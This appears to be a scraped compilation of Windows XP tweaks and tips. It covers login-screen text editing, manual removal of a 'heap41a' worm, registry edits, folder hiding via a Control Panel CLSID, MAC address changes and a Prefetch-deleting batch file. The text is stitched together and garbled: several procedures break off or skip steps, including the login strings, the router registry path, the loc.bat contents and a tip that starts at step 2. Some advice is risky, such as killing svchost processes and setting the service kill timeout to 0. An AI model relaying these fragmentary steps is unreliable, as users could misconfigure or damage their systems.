Changing Windows XP Login Screen Text Entries

So, You hv to edit following 2 files:

LogonUI.exe
Winlogon.exe

LogonUI.exe file contains most of the Text entries of the login screen and Winlogon.exe file contains the text, which is displayed when u login/logout the windows, like Windows is shutting down..., etc.

So first we'll edit LogonUI.exe file:

1.) Open %windir%\System32\LogonUI.exe file in Resource Hacker and navigate to String Table section.
2.) Here u'll find sub-directories, 1,2,3,4,7, in which only first 3 directories 1,2,3 r of our use.
3.) Following r the locations of some interesting Text entries, which u will like to change:

Ultimate Solution for this problem
Even i had the same problem. just follow the following steps, the
worm will be deleted forever:

1.Press CTRL+ALT+DEL and go to the processes tab

2.Look for svchost.exe under the image name. There will be many but
look for the ones which have your username under the username

3.Press DEL to kill these files. It will give you a warning, Press
Yes

4.Repeat for more svchost.exe files with your username and repeat. Do
not kill svchost.exe with system, local service or network service!

5.Now open My Computer

6.In the address bar, type "C:\heap41a" and press enter

7.Delete all the files here

8.Now go to start -> Run and type "Regedit"

9.Go to the menu EDIT --> FIND

10.Type "heap41a" here and press enter

11.You will get something like this "[winlogon]

12.Press DEL. It will ask "Are you sure you wanna delete this value",
click "Yes"

When a user shuts down Windows XP, first the system has to kill all services currently running. Every once in a while the service does not shut down instantly and windows gives it a change to shut down on its own before it kills it. This amount of time that windows waits is stored in the system registry. If you modify this setting, then windows will kill the service earlier. To modify the setting, follow the directions below:
Start n then click on RUN then write there "Regedit".
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
Click on the "Control" Folder.
Select "WaitToKillServiceTimeout"
Right click on it and select Modify.
Set it a value lower than 2000 (Mine is set to 0).

Password protected folders with out SOFTWARE

If you have a log in password for your account, this can be used to protect folders from other users. Your hard drive must be formatted using NTFS (which it probably is unless you're dual booting with another operating system). Here's what to do...
Right-click the folder that you want to make private and choose "Properties"
(or Alt+Double-click). Go to the "Sharing" tab and check the "Make this folder private" box.
Click Apply . If you do not have a password on your account, a box will pop up asking if you want to assign a password. This must be done if you want to make the folder private, so click Yes . You will need to use your password to log on to your computer from then on.
Type in a password then confirm it. Click the "Create Password" button then close the Password window.
Click OK in the Properties dialog box.
Now anyone else logged on to your computer can't access that file without knowing your password.

Hide Files/folder Without Any Software

HIDE FILES/FOLDER IN A SUCURE MANNER WIHOUT ANY SOFTWARE

HIDING STEPS -
                                                      

1. Right click on the file/folder that u want to hide then Send to ->New
Compressed (zipped) Folder
2.Change the file extention from *.zip to anything or nothing (like xzy.zip to xyz/xyz.dll/xyz.pdf/xyz.doc/etc)

TIP: Change to *.dll for safest hiding.

3. Now save this text file as loc.bat or any other file with an extension ".bat"
4. Create another notepad file and type ren LEARNER.{21EC2020-3AEA-1069-A2DD-08002B30309D} LEARNER
5. Save this as key.bat or any other file with an extension ".bat"
6. Now there are two batch files. Double click loc.bat and your folder will change into Control Panel and its contents cannot be viewed
7. To open the folder double click key.bat and you get back your original folder .
8. For more safety keep the key.bat in another location .Only for unlocking copy paste to the original location and double click.

Changing the MAC address in W2K and XP

This is depending on the type of Network Interface Card (NIC) you have. If you have a card that doesn’t support Clone MAC address, then you have to go to second method.

1.Go to Start->Settings->Control Panel and double click on Network and Dial-up Connections.

2.Right click on the NIC you want to change the MAC address and click on properties.

3.Under “General” tab, click on the “Configure” button

4.Click on “Advanced” tab

5.Under “Property section”, you should see an item called “Network Address” or "Locally Administered Address", click on it.

6.On the right side, under “Value”, type in the New MAC address you want to assign to your NIC. Usually this value is entered without the “-“ between the MAC address numbers.

7.Goto command prompt and type in “ipconfig /all” or “net config rdr” to verify the changes. If the changes are not materialized, then use the second method.

8.If successful, reboot your systems.

How to Convert FAT to NTFS file system

To convert a FAT partition to NTFS, perform the following steps.
Click Start, click Programs, and then click Command Prompt.
In Windows XP, click Start, click Run, type cmd and then click OK.
At the command prompt, type CONVERT [driveletter]: /FS:NTFS.
Convert.exe will attempt to convert the partition to NTFS.

NOTE: Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command. It is also recommended to verify the integrity of the backup before proceeding, as well as to run RDISK and update the emergency repair disk (ERD).

To change drive letters

To change drive letters (useful if you have two drives and have partitioned the boot drive, but the secondary drive shows up as "D")

Go to Start > Control Panel > Administrative Tools > Computer Management, Disk Management, then right-click the partition whose name you want to change (click in the white area just below the word "Volume") and select "change drive letter and paths."
From here you can add, remove or change drive letters and paths to the partition

W2K Pro / XP router between to network segments

How can I configure my W2K Pro / XP Pro machine to act as a router between to network segments?
Routing is configured on a W2K Server / Windows Server 2003 machine by use of the RRAS snap-in. However, this console is NOT available on a W2K Pro or XP Pro machine.
If you have 2 small network segments populated with no more than a handful of computers per segment, you CAN use a W2K Pro / XP Pro machine as a router between these segments.
First, you need to install at least 2 NICs on the machine.
Now you need to configure each NIC with the appropriate IP address for the segments that it's connected to.
Next, you need to configure that IP as the Default Gateway for all the computers on that NIC.
For example, if you have 2 segments (we'll call them Segment A and Segment B respectively) with the following Network IDs:
Segment A - 192.168.0.0/24
Segment B - 192.168.1.0/24
(/24 means 255.255.255.0 - see my What's CIDR? page for more info)
and on your computer you have 2 NICs (we'll call them NIC A and NIC B respectively) with the following IP addresses:
NIC A - 192.168.0.1
NIC B - 192.168.1.1
Then the IP addresses of NIC A and NIC B will be the Default Gateways for segment A and B respectively.
Next, you need to configure IP Routing between the segments. As I said, this feature is not configurable via any GUI in W2K Pro and XP Pro, so you'll need to edit the registry:
In the Run command type Regedit.exe and press Enter.
In the registry navigate to

When you use Telnet to connect to the a Windows 2000/2003-based server the following banner is displayed:

You can change your Telnet server to display a banner and run programs upon logon for all users by modifying the Login.cmd file. You can modify this file to run other programs (such as a different shell). The commands in the Login.cmd file are run for all users.

To change the prompt in the Telnet banner, follow these steps:

1.Use any text editor (such as Notepad) to open the %SystemRoot%\System32\Login.cmd file.
                                                                
2.Modify the Telnet server banner or add the path and name of the program you want to run upon logon.

Changing The Internet Time Update Synchronisation

To change the interval that Windows updates the time using the internet time servers via regedit, navigate to:
1. HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services \W32Time\TimeProviders\NtpClient
2. Select "SpecialPollInterval"
3. Change decimal value from 604800 to a different value in seconds. i.e.: 172800 (2 Days) or 86400 (1 Day) and so on.
We don't recommend changing this unless you are on a broadband connection.

Slow Shutdown

Some people have noticed that they are experiencing a really slow shutdown after installing Windows XP Home or Professional. Although this can be caused a number of ways, the most clear cut one so far is happening on systems with an NVidia card installed with the latest set of drivers. A service called NVIDIA Driver Helper Service is loading up on start up and for whatever reason doesn't shut itself down properly. The service isn't needed and can also increase the amount of memory available to your system. Here is how to disable it.

1: Go into your Control Panel
2: Select Administrative Tools and then click on Services
3: Right click on the file "NVIDIA Driver Helper Service" and then select STOP.
4: To stop this loading up every time you boot up your PC Right click it again and select properties - then where the option "Startup Type" is shown - make sure it is set at Manual.

Rename a Series of Files

When you download photos from your digital camera, they often have unrecognizable
                                                                                   
names. You can rename several similar files at once with the following procedure. This also works for renaming other types of files.

1.Open the My Pictures folder. (Click Start, and then click My Pictures.) Or open another folder containing files that you want to rename.
2.Select the files you want to rename. If the files you want are not adjacent in the file list, press and hold CTRL, and then click each item to select it.
3.On the File menu, click Rename.
4.Type the new name, and then press ENTER.

All of the files in the series will be named in sequence using the new name you type. For example, if you type Birthday, the first will be named Birthday and subsequent files in the series will be named Birthday (1), Birthday (2), and so on. To specify the starting number for the series, type the starting number in parentheses after the new file name. The files in the series will be numbered in sequence starting with the number you type. For example, if you type Birthday (10), the other files will be named Birthday (11), Birthday (12), and so on.

Remove Shared Documents

Open Regedit(Start- Run- Regedit) and navigate to HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Explorer My Computer NameSpace DelegateFolders

There will see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. By Deleting this you can remove the 'Other Files stored on This Computer' group.

Occasionally, you may want to save an entire Web page on your computer (text, hyperlinks, graphics, and all). To save the Web page that currently appears in Internet Explorer, choose File-->Save As to open the Save Web Page dialog box shown in the following figure. Select the folder in which you want the page saved and then click the Save button.

After saving a Web page on your hard drive, you can open it in Internet Explorer and view
                                                                                  
the contents even when you're not connected to the Internet. If your motive for saving the                Web page, however, is to be able to view the content when you're not connected to the Internet, you're better off saving the page as a Favorite marked for offline viewing. That way, you can decide whether you want to view other pages linked to the one you're saving and you can have Internet Explorer check the site for updated content.

You can also e-mail a Web page or a link to the page to a colleague or friend. To send the current Web page in a new e-mail message, click File-->Send-->Page by E-mail on the Explorer menu bar and then fill out the new e-mail. WindowsXP has a program called SHUTDOWN.EXE which allows you to easily create icons to
shutdown or restart your computer.

To create a shutdown shortcut on the desktop:
Right click on an open area of the desktop
Select New / Shortcut
Enter in "shutdown -s -t 00" - no quotes
Press the Next button
For the name, enter in anything you like. I just use shutdown. Click on the Finish button.

Parameters
-l - Logs off the current user, this is also the defualt. -m ComputerName takes precedence.

-f - Forces running applications to close.
-m [\\ComputerName] - Specifies the computer that you want to shut down.
-t xx - Sets the timer for system shutdown in xx seconds. The default is 20 seconds.
-c "message" - Specifies a message to be displayed in the Message area of the System Shutdown window. You can use a maximum of 127 characters. You must enclose the message in quotation marks

The following switches are available:

/F - fix any errors
/R - identifies bad sectors
/V - with FAT32, displays a verbose output

/I - Performs simpler check (stage 2)
/C - Skips the checking of cycles within folder structures
/X - Forces the volume to dismount if necessary. Intended for server administrators and should be avoided for normal use

10 essential things for making windows better

Here are 10 additional ways to make life with Windows easier and more productive.

1. If you have a "wheel mouse,'' skip the rolling scrolling stuff and turn the wheel into a useful button. I have mine set up to perform a left double click when I do a single click on the wheel button. I'm not young any more, and double-clicking isn't as easy as it used to be. So clicking that middle button for a left double click is a big plus me. (Your mouse software should let you change the behavior of the wheel. If it doesn't, get a Microsoft Intellimouse. It has the right software options in addition to being a great mouse.)

2. Give the keyboard a boost. Open the Control Panel (under "Settings'' in the Start Menu) and double click on the Keyboard icon. Slide the "Repeat Delay'' and "Repeat Rate'' controls all the way to the right. This will make the keyboard much faster, and it even speeds up scrolling with the mouse.

3. Click your right mouse button on a file whenever you're not sure what to do with it. You'll see a list of choices. This can save you a lot of fiddling.

4. Switch your folders to "Details'' view so you can quickly sort the listing. Choose "Details" from the "View" menu at the top of any Windows folder. (Folders are windows that show you what's in your computer.  example.) Sort the list in a "Details'' view by clicking on the heading for that part of the list.
Clicking "Modified'' sorts the contents by the modification date (latest or oldest first), for example. And clicking again on the same heading reverses the sort.

6. Save your wrist, Part 2. Pesky messages that come up on your screen usually can be closed with a single whack of the Esc key. Don't bother clicking your mouse.

7. Reboot early and often. Windows runs out of its disappointingly small "system" memory pool (called resource memory) all too readily, leading to lockups and crashes. Adding memory chips doesn't help. Rebooting is the only way to get that memory back.

8. Enjoy a real-estate boom. Get more windows to fit on your screen. If you have a 17-inch (or larger) PC monitor, drop the two drecky screen resolutions and switch to 1024 by 768. (The two yucky ones are 640 by 480 and 800 by 600.) Right click on the desktop and click "Properties,'' then "Settings.'' Slide the control over to 1024 by 768. If you have a really big monitor, see if you can choose an even higher setting for resolution. One of my 21-inch monitors is set for 1200 by 1024 and the other is set for 1600 by 1200. I wouldn't switch back to a lower resolution if you paid me.

9. Toss your cookies. We could argue forever over which rock'n' roll band is the greatest of all time and which kind of coffee is the best, but nobody could argue about the best way to control Web cookies in Windows. The winner by far is Cookie Pal. Don't leave your home page without it. Get it from http://www.kburra. com/.

10. Down with the load. Make life easier when you download files by making a folder where you can find them. Double click on "My Computer" and then double click on the C: drive. Right click inside the C: drive window and create a new folder with the name "Downloads." The next time you are about to download a file, RIGHT CLICK on the link and tell Windows to put the file in the "Downloads" folder. All subsequent downloads will go there automatically.

Recover your scratched cd

Recover Your Scratched CDs

Every one has had trouble with a scratched CD. Scratched data CD can't be read properly and in case of audio CD ,the CD skips when we play it.

The first thing to do with a CD which gives a reading error, is to clean it; to check that the error is not being caused by a dirty surface. You can try cleaning the CD with a soft cotton cloth by wiping its surface . Start at the center and rub gently straight outward towards the edge. In case of a stubborn stain,you can try using warm water with some mild soap.Avoid sponges since they can scratch the CD.

A CD's data is recorded on a metal layer inside it. This metal layer is inset in a transparent plastic covering (polycarbonate) which is used to protect the CD's metal layer and to allow printing a label on the side not used for reading.

A CD-ROM drive uses a laser beam to read the metal layer. This laser beam crosses the plastic layer and reads the metal layer. If the plastic layer is scratched, the beam will be unable to pass through it as it will get deviated, resulting in a read error. The data to be read still lies in the CD, the trouble lies in the layer of plastic.

So how to repair this CD which holds your favourite Elvis Presly track?

As the CD's contents are preserved, a scratched CD can be recovered by polishing its plastic surface.
The aim is to make the laser beam reach the metal surface which holds the data, in a straight line, without any deviations and change in intensity which may otherwise arise in a scratched CD.

Try polishing your CD with a "toothpaste"(baking soda toothpaste).Polish the scratches with a cotton swab. Rub gently the paste-imbued swab over the scratches until they disappear or until you notice that you have removed them as far as possible.Do all the cleaning gently.Do not apply pressure.After clearing the scratches, wash the CD in water.Let the water evaporate by itself.Do not keep the CD in sunlight.Keep it in a cool and shady area.
DO NOT USE A GEL TOOTHPASTE.

If the scratches still persist try using a metal polish (Brasso) in the same way as described above. Rub Vaseline on the CD, very gently (do not press hard).Rub from the centre to the rim. Wipe excess off using clean, soft, lint-free cloth in a radial (inside to outside) motion.
Test disc again. If the Vaseline does the trick, burn a new copy of the CD immediately. The Vaseline method is only a temporary solution.

1. Go into My Computer and go into your hard drive.

2. Right-click anywhere that a file is not and select the 'New' submenu and click 'Text Document'

3. Name it "deleteprefetch"

4. Double-click on the text file you just created.

5. Type "del C:\Windows\Prefetch\*.* /Q" (without the quotes).

6. Go to File > Save As... and choose "All Files" from the "Save as Type" box and save it as "deleteprefetch.bat"

7. You just created a batch file that will automatically delete all the files in your Prefetch folder. Congrats.

My Computer Menu Look Like This

Here is a screen shot of what i would like my right click My Computer context menu to look like. I am unable to find many of the tweaks required to do this. Does anyone know the registry tweaks that would apply these settings.

If you know where some of them are, then you already know which keys in the registry need to be modified, and in fact can see how they need to be modified to launch and app or applet. Just alter the path of the required .exe, .dll, or .msc file in the registry key and include the command to show on the menu. I'd understand if you didn't know where to start, but you clearly do. Have you really tried to make it work as you want and failed? The CLSID you are looking for is {20D04FE0-3AEA-1069-A2D8-08002B30309D}.

2)Now rename the folder with a space(U have to hold ALT key and type 0160).
3) Now u have a folder with out a name.

Make Your Own Icons

It's shockingly easy to create your own icons in Windows XP. Let's do it: Click Start, click All Programs, click Accessories, and then click Paint. On the Image menu, click Attributes. Type 32 for both the Width and Height of the document, and make sure that Pixels is selected under Units. Click OK to create a new 32x32-pixel document: the size of an icon.
Now add type, color, or do whatever you'd like to your image. I like to shrink photos (headshots work best) to 32x32 and simply paste them into my Paint document. When you're finished, open the File menu and click Save As. Use the dialog box to choose where you want to save your file, then give it a name followed by ".ico" (without the quotes), and click Save. (The extension ".ico" tells Windows that it's an icon file.) You just created an icon! Now you can change any shortcut or folder to your own icon—just browse to it on your hard drive.
